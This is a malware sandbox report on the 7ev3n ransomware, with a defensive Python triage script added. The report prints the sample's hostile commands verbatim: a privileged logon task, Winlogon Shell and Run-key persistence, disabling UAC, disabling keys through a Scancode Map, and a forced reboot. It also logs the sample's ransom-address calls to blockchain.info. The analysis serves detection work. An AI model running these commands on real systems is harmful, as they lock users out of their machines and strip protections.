Analysis

  • max time kernel
    72s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-uk
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-uk, locale:uk-ua, os:windows10-2004-x64, system, windows
  • submitted
    03-03-2024 13:53

Errors

Reason
Machine shutdown

General

  • Target

    Ransomware/7ev3n.exe

  • Size

    315KB

  • MD5

    9f8bc96c96d43ecb69f883388d228754

  • SHA1

    61ed25a706afa2f6684bb4d64f69c5fb29d20953

  • SHA256

    7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

  • SHA512

    550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

  • SSDEEP

    6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ransomware\7ev3n.exe
    "C:\Users\Admin\AppData\Local\Temp\Ransomware\7ev3n.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Users\Admin\AppData\Local\system.exe
      "C:\Users\Admin\AppData\Local\system.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2996
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
        3⤵
        PID:4516
      • C:\Windows\SysWOW64\SCHTASKS.exe
        C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:2212
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          4⤵
          • Modifies WinLogon for persistence
          PID:880
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3308
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          4⤵
          • Adds Run key to start application
          PID:1412
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
          4⤵
          PID:1748
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1868
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
          4⤵
          PID:2244
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:796
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
          4⤵
          PID:2020
      • C:\windows\SysWOW64\cmd.exe
        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3668
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
          4⤵
          • UAC bypass
          PID:3376
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
          4⤵
          PID:1492
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4188
        • C:\Windows\SysWOW64\shutdown.exe
          shutdown -r -t 10 -f
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1020
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3940855 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:1636
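
The registry and schtasks commands in the tree above are the sample's whole persistence and lock-down routine: a scheduled task that runs bcd.bat at every logon with /RL HIGHEST, system.exe installed both as the Winlogon Shell and as a Run value, EnableLUA set to 0, a Scancode Map that remaps keys, a StickyKeys Flags value of 506, and a forced reboot so that the new Shell and the Scancode Map take effect. The Python below is an added example, not the sandbox's or the sample's code: it classifies those command lines with a small rule set (the rule text and the ATT&CK technique numbers are this example's own mapping) and decodes the Scancode Map blob (the scan-code names are the standard PS/2 set-1 codes). The decoder also reports the entry count the blob declares against the DWORDs actually present; for this blob they disagree (0x17 = 23 declared, 17 present including the terminator), and how Windows treats that mismatch is not something the report establishes.

```python
"""Triage of the child command lines in the process tree above.

Added example, not code from the sandbox or from the sample: the command lines are
copied from the report; the REG ADD parser, the rules, the ATT&CK mapping and the
scan-code names (standard PS/2 set-1 codes) are this example's own.
"""
import re
import struct

# Value the sample wrote to HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout\Scancode Map.
SCANCODE_MAP_HEX = (
    "00000000000000001700000000003800000038e000005be000005ce00000360000001d00"
    "00001de000000f000000010000001c0000003e0000003b00000044000000450000003d00"
    "00005de000000000"
)

# Leaf command lines from the tree (the cmd.exe /c wrappers repeat the same text and are omitted).
COMMAND_LINES = [
    r'C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "' + SCANCODE_MAP_HEX + '" /f /reg:64',
    r'REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64',
    r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64',
    r'shutdown -r -t 10 -f',
]

SCAN_CODE_NAMES = {  # PS/2 set-1 make codes; 0xE0xx are the extended keys
    0x01: "Esc", 0x0F: "Tab", 0x1C: "Enter", 0x1D: "Left Ctrl", 0x36: "Right Shift",
    0x38: "Left Alt", 0x3B: "F1", 0x3D: "F3", 0x3E: "F4", 0x44: "F10", 0x45: "Num Lock",
    0xE01D: "Right Ctrl", 0xE038: "Right Alt", 0xE05B: "Left Win", 0xE05C: "Right Win",
    0xE05D: "Apps/Menu",
}
SKF_HOTKEYACTIVE = 0x4  # StickyKeys Flags bit that keeps the Shift x5 hotkey enabled


def _key_name(code):
    return SCAN_CODE_NAMES.get(code, f"0x{code:04X}")


def decode_scancode_map(hexblob):
    """Decode a Scancode Map value: header of three DWORDs (version, flags, entry
    count including the null terminator), then one DWORD per mapping whose high
    word is the physical key and whose low word is the code sent instead (0 = key
    disabled). The declared count is reported next to the DWORDs actually present."""
    raw = bytes.fromhex(hexblob)
    version, flags, declared = struct.unpack_from("<III", raw, 0)
    words = [struct.unpack_from("<HH", raw, off) for off in range(12, len(raw) - 3, 4)]
    mappings = []
    for sent, physical in words:  # little-endian, so the low word comes first
        if sent == 0 and physical == 0:
            break  # null terminator
        mappings.append((_key_name(physical), "disabled" if sent == 0 else _key_name(sent)))
    return {"version": version, "flags": flags, "declared_count": declared,
            "present_count": len(words), "count_consistent": declared == len(words),
            "mappings": mappings}


REG_ADD = re.compile(r'REG ADD "(?P<key>[^"]+)" /v "(?P<name>[^"]+)" /t \w+ '
                     r'/d (?:"(?P<qdata>[^"]*)"|(?P<data>\S+))', re.IGNORECASE)

# (key suffix, accepted value names or () for any, predicate on the data, finding)
REG_RULES = [
    (r"\windows nt\currentversion\winlogon", ("shell",), lambda d: d.lower() != "explorer.exe",
     "Winlogon Shell replaced by a dropped binary (T1547.004)"),
    (r"\currentversion\run", (), lambda d: True, "Run key added (T1547.001)"),
    (r"\policies\system", ("enablelua",), lambda d: d == "0", "UAC disabled, EnableLUA=0 (T1548.002)"),
    (r"\control\keyboard layout", ("scancode map",), lambda d: True, "Scancode Map set: keys remapped or disabled"),
    (r"\accessibility\stickykeys", ("flags",), lambda d: d.isdigit() and not int(d) & SKF_HOTKEYACTIVE,
     "StickyKeys Shift x5 hotkey disabled (Flags lacks SKF_HOTKEYACTIVE)"),
    (r"\windows\currentversion", ("rgd_bcd_condition", "crypted"), lambda d: True,
     "infection-state marker written by this sample"),
]


def classify(cmdline):
    """Return the findings for one command line (empty list if nothing matched)."""
    findings = []
    if re.search(r"schtasks(?:\.exe)?\s+/create", cmdline, re.I):
        if re.search(r"/SC\s+ONLOGON", cmdline, re.I) and re.search(r"/RL\s+HIGHEST", cmdline, re.I):
            findings.append("scheduled task runs at every logon with highest privileges (T1053.005)")
    if re.search(r"shutdown(?:\.exe)?\s+-r\b.*\s-f\b", cmdline, re.I):
        findings.append("forced reboot: Scancode Map is read at boot, the new Shell at logon")
    m = REG_ADD.search(cmdline)
    if m:
        key, name = m["key"].lower(), m["name"].lower()
        data = m["qdata"] if m["qdata"] is not None else m["data"]
        for suffix, names, cond, verdict in REG_RULES:
            if key.endswith(suffix) and (not names or name in names) and cond(data):
                findings.append(verdict)
    return findings


if __name__ == "__main__":
    for cmd in COMMAND_LINES:
        print(cmd[:60] + "...", "->", "; ".join(classify(cmd)))
    scm = decode_scancode_map(SCANCODE_MAP_HEX)
    print(f"Scancode Map: {scm['declared_count']} entries declared, {scm['present_count']} present")
    print("keys disabled:", ", ".join(k for k, s in scm["mappings"] if s == "disabled"))
```

Run stand-alone it prints one finding per command line and the decoded map: all sixteen mappings send scan code 0, so the physical key is disabled, and the keys are Esc, Tab, Enter, both Ctrl, both Alt, both Win, Right Shift, F1, F3, F4, F10, Num Lock and Apps. Together with Flags=506, which clears SKF_HOTKEYACTIVE (0x4), this removes Ctrl+Alt+Del, Alt+Tab, Alt+F4, the Win key and the StickyKeys hotkey before system.exe starts as the logon shell; that is the lock-screen half of the sample, not its file encryption, which this report does not show.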

            Network

            • flag-us
              DNS
              81.171.91.138.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              81.171.91.138.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              134.32.126.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              134.32.126.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              0.205.248.87.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              0.205.248.87.in-addr.arpa
              IN PTR
              Response
              0.205.248.87.in-addr.arpa
              IN PTR
              https-87-248-205-0.lgw.llnw.net
            • flag-us
              DNS
              183.59.114.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              183.59.114.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              blockchain.info
              7ev3n.exe
              Remote address:
              8.8.8.8:53
              Request
              blockchain.info
              IN A
              Response
              blockchain.info
              IN A
              104.17.139.37
              blockchain.info
              IN A
              104.17.141.37
              blockchain.info
              IN A
              104.17.138.37
              blockchain.info
              IN A
              104.17.137.37
              blockchain.info
              IN A
              104.17.140.37
            • flag-us
              GET
              https://blockchain.info/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              7ev3n.exe
              Remote address:
              104.17.139.37:443
              Request
              GET /api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e HTTP/1.1
              User-Agent: Internet Explorer
              Host: blockchain.info
              Response
              HTTP/1.1 301 Moved Permanently
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: keep-alive
              Location: https://www.blockchain.com/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              X-Blockchain-Cp-F: zzwb 0.000 998ec0fb9ba801d66eb3744c84f53414
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: blockchain.info
              X-Request-Id: 998ec0fb9ba801d66eb3744c84f53414
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 85ea21091d02dd33-LHR
            • flag-us
              GET
              https://blockchain.info/q/getreceivedbyaddress/tle><meta%20name=
              7ev3n.exe
              Remote address:
              104.17.139.37:443
              Request
              GET /q/getreceivedbyaddress/tle><meta%20name= HTTP/1.1
              User-Agent: Internet Explorer
              Host: blockchain.info
              Response
              HTTP/1.1 404 Not Found
              Date: Sun, 03 Mar 2024 13:56:18 GMT
              Content-Type: application/json; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Access-Control-Allow-Origin: *
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Vary: Accept-Encoding
              X-Blockchain-Cp-B: haskoin-store-btc
              X-Blockchain-Cp-F: zzwb 0.005 - 91815a10745943b71ce5eb8173efff9d
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: blockchain.info
              X-Request-Id: 91815a10745943b71ce5eb8173efff9d
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 85ea210c6920dd33-LHR
            • flag-us
              DNS
              www.blockchain.com
              7ev3n.exe
              Remote address:
              8.8.8.8:53
              Request
              www.blockchain.com
              IN A
              Response
              www.blockchain.com
              IN A
              104.16.29.98
              www.blockchain.com
              IN A
              104.16.30.98
            • flag-us
              GET
              https://www.blockchain.com/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              7ev3n.exe
              Remote address:
              104.16.29.98:443
              Request
              GET /api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e HTTP/1.1
              User-Agent: Internet Explorer
              Host: www.blockchain.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 302 Found
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: keep-alive
              Location: https://www.blockchain.com/explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              X-Blockchain-Cp-F: zzwb 0.000 c28896fab281034926ed9db81a9b6d4b
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: www.blockchain.com
              X-Request-Id: c28896fab281034926ed9db81a9b6d4b
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: MISS
              Server: cloudflare
              CF-RAY: 85ea210a1f81dd0f-LHR
            • flag-us
              GET
              https://www.blockchain.com/explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              7ev3n.exe
              Remote address:
              104.16.29.98:443
              Request
              GET /explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e HTTP/1.1
              User-Agent: Internet Explorer
              Host: www.blockchain.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 302 Found
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Transfer-Encoding: chunked
              Connection: keep-alive
              Location: /explorer/api
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              X-Blockchain-Cp-B: explorer-react-frontend
              X-Blockchain-Cp-F: zzwb 0.002 - 792844396894e9372263e8937ee0da3d
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: www.blockchain.com
              X-Request-Id: 792844396894e9372263e8937ee0da3d
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: MISS
              Server: cloudflare
              CF-RAY: 85ea210a7fe9dd0f-LHR
            • flag-us
              GET
              https://www.blockchain.com/explorer/api
              7ev3n.exe
              Remote address:
              104.16.29.98:443
              Request
              GET /explorer/api HTTP/1.1
              User-Agent: Internet Explorer
              Host: www.blockchain.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Cache-Control: public, max-age=30, stale-while-revalidate=60, must-revalidate
              Content-Language: en
              Content-Security-Policy: default-src 'self'; media-src 'self' https://anchor.fm https://*.cloudfront.net *.adform.net *.bannerflow.net; connect-src wss: https:; object-src 'none'; frame-src https://request-global.czilladx.com/ https://*.safeframe.googlesyndication.com/ *.googlesyndication.com; frame-ancestors 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.blockchain.com *.google-analytics.com https://coinzillatag.com/lib/display.js *.czilladx.com googleads.g.doubleclick.net https://cdn4.buysellads.net www.googletagservices.com *.googletagmanager.com c.amazon-adsystem.com securepubads.g.doubleclick.net c.amazon-adsystem.com adservice.google.com adservice.google.be tpc.googlesyndication.com btloader.com https://d3div1mtym39ic.cloudfront.net/aax2/apstag.js blob: *.cloudflare.com *.createjs.com *.cleverwebserver.com banner.org.ua *.addform.net *.bannerflow.net *.2mdn.net; form-action 'self'; style-src 'self' 'unsafe-inline' https://rsms.me fonts.googleapis.com *.adform.net *.2mdn.net; font-src 'self' https://rsms.me *.googleapis.com *.gstatic.com *.bannerflow.net *.adform.net; img-src 'self' https: data:; script-src-elem 'self' 'unsafe-inline' 'unsafe-eval' blob: *.cloudflare.com *.createjs.com *.cleverwebserver.com https://coinzillatag.com/lib/display.js *.czilladx.com banner.org.ua *.addform.net *.bannerflow.net *.2mdn.net https://*.blockchain.com *.google-analytics.com googleads.g.doubleclick.net https://cdn4.buysellads.net www.googletagservices.com *.googletagmanager.com c.amazon-adsystem.com securepubads.g.doubleclick.net c.amazon-adsystem.com adservice.google.com adservice.google.be tpc.googlesyndication.com btloader.com https://d3div1mtym39ic.cloudfront.net/aax2/apstag.js; child-src 'self' *.coinzilla.com *.coinzilla.io *.clevernt.com *.cleverwebserver.com feedapi.live hash.game bc.co bc.fun bcga.me bc.app bc.game;
              Referrer-Policy: strict-origin-when-cross-origin
              Set-Cookie: clang=en; Path=/
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              X-Blockchain-Cp-B: explorer-react-frontend
              X-Blockchain-Cp-F: zzwb 0.162 - d3807f6c58940156d4ac1d543995c64d
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Frame-Options: DENY
              X-Middleware-Cache: STALE
              X-Original-Host: www.blockchain.com
              X-Powered-By: Next.js
              X-Request-Id: d3807f6c58940156d4ac1d543995c64d
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: MISS
              Server: cloudflare
              CF-RAY: 85ea210ad83edd0f-LHR
            • flag-us
              DNS
              43.58.199.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              43.58.199.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              56.126.166.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              56.126.166.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              37.139.17.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              37.139.17.104.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              98.29.16.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              98.29.16.104.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              jaster.in
              system.exe
              Remote address:
              8.8.8.8:53
              Request
              jaster.in
              IN A
              Response
            • flag-us
              DNS
              140.71.91.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              140.71.91.104.in-addr.arpa
              IN PTR
              Response
              140.71.91.104.in-addr.arpa
              IN PTR
              a104-91-71-140.deploy.static.akamaitechnologies.com
            • flag-us
              DNS
              178.223.142.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              178.223.142.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              jaster.in
              system.exe
              Remote address:
              8.8.8.8:53
              Request
              jaster.in
              IN A
              Response
            • flag-us
              DNS
              59.189.79.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              59.189.79.40.in-addr.arpa
              IN PTR
              Response
            • 52.142.223.178:80
              52 B
              1
            • 104.17.139.37:443
              https://blockchain.info/q/getreceivedbyaddress/tle><meta%20name=
              tls, http
              7ev3n.exe
              1.2kB
              6.5kB
              14
              9

              HTTP Request

              GET https://blockchain.info/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e

              HTTP Response

              301

              HTTP Request

              GET https://blockchain.info/q/getreceivedbyaddress/tle><meta%20name=

              HTTP Response

              404
            • 104.16.29.98:443
              https://www.blockchain.com/explorer/api
              tls, http
              7ev3n.exe
              7.1kB
              153.2kB
              136
              131

              HTTP Request

              GET https://www.blockchain.com/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e

              HTTP Response

              302

              HTTP Request

              GET https://www.blockchain.com/explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e

              HTTP Response

              302

              HTTP Request

              GET https://www.blockchain.com/explorer/api

              HTTP Response

              200
            • 8.8.8.8:53
              81.171.91.138.in-addr.arpa
              dns
              72 B
              146 B
              1
              1

              DNS Request

              81.171.91.138.in-addr.arpa

            • 8.8.8.8:53
              134.32.126.40.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              134.32.126.40.in-addr.arpa

            • 8.8.8.8:53
              0.205.248.87.in-addr.arpa
              dns
              71 B
              116 B
              1
              1

              DNS Request

              0.205.248.87.in-addr.arpa

            • 8.8.8.8:53
              183.59.114.20.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              183.59.114.20.in-addr.arpa

            • 8.8.8.8:53
              blockchain.info
              dns
              7ev3n.exe
              61 B
              141 B
              1
              1

              DNS Request

              blockchain.info

              DNS Response

              104.17.139.37
              104.17.141.37
              104.17.138.37
              104.17.137.37
              104.17.140.37

            • 8.8.8.8:53
              www.blockchain.com
              dns
              7ev3n.exe
              64 B
              96 B
              1
              1

              DNS Request

              www.blockchain.com

              DNS Response

              104.16.29.98
              104.16.30.98

            • 8.8.8.8:53
              43.58.199.20.in-addr.arpa
              dns
              71 B
              157 B
              1
              1

              DNS Request

              43.58.199.20.in-addr.arpa

            • 8.8.8.8:53
              56.126.166.20.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              56.126.166.20.in-addr.arpa

            • 8.8.8.8:53
              37.139.17.104.in-addr.arpa
              dns
              72 B
              134 B
              1
              1

              DNS Request

              37.139.17.104.in-addr.arpa

            • 8.8.8.8:53
              98.29.16.104.in-addr.arpa
              dns
              71 B
              133 B
              1
              1

              DNS Request

              98.29.16.104.in-addr.arpa

            • 8.8.8.8:53
              jaster.in
              dns
              system.exe
              55 B
              108 B
              1
              1

              DNS Request

              jaster.in

            • 8.8.8.8:53
              140.71.91.104.in-addr.arpa
              dns
              72 B
              137 B
              1
              1

              DNS Request

              140.71.91.104.in-addr.arpa

            • 8.8.8.8:53
              178.223.142.52.in-addr.arpa
              dns
              73 B
              147 B
              1
              1

              DNS Request

              178.223.142.52.in-addr.arpa

            • 8.8.8.8:53
              jaster.in
              dns
              system.exe
              55 B
              108 B
              1
              1

              DNS Request

              jaster.in

            • 8.8.8.8:53
              59.189.79.40.in-addr.arpa
              dns
              71 B
              145 B
              1
              1

              DNS Request

              59.189.79.40.in-addr.arpa

            MITRE ATT&CK Enterprise v15


            Downloads

            • C:\Users\Admin\AppData\Local\del.bat

              Filesize

              76B

              MD5

              2623d4a3f9735b4a8298ad5050eb73ef

              SHA1

              3dcd1491a378acd63f725bd427ecb9810dc3cea2

              SHA256

              01ddb9a534a1519c377c6951557207284a9a941870951797b2dfa5ed86a85709

              SHA512

              aff6ca24a072b2219dafaa751a011cf41b5e8f638438e79d4e1852ff33ce7dbfa87e9e36b867866b2b8bd5ae30f0267d0ce2827caea21ec73a690ae9b4e329e8

            • C:\Users\Admin\AppData\Local\system.exe

              Filesize

              315KB

              MD5

              68c8e18a1887eedc3da23719a34f6329

              SHA1

              682a53bb3b8006219f0cfde25f7866db755c0a19

              SHA256

              b3d38fd9bc60f5610c262392e8dcce0ad05b6a7ebc4e4b7232578ed80ff0270d

              SHA512

              2733065fe4e2ee1749bfb78d5541cdb5204f291ceec4711da856e4e8f2d80eed51169c5434afbcc493434862787267f878de619847f03113c078a24d8f177c07
